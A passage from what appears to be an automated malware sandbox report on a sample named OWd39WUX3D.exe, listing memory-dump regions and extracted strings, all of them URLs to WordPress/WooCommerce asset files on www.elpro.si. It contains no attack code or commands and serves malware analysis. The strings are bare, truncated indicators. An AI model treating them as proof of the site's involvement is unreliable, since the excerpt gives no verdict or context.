00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-gdpr
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-publ
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/cookie-law-info-publi
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/cart_widget.min.js?ver=5.2.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/front-scripts.min.js?ver=5.2.
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.9.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.9.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.9.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.9.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 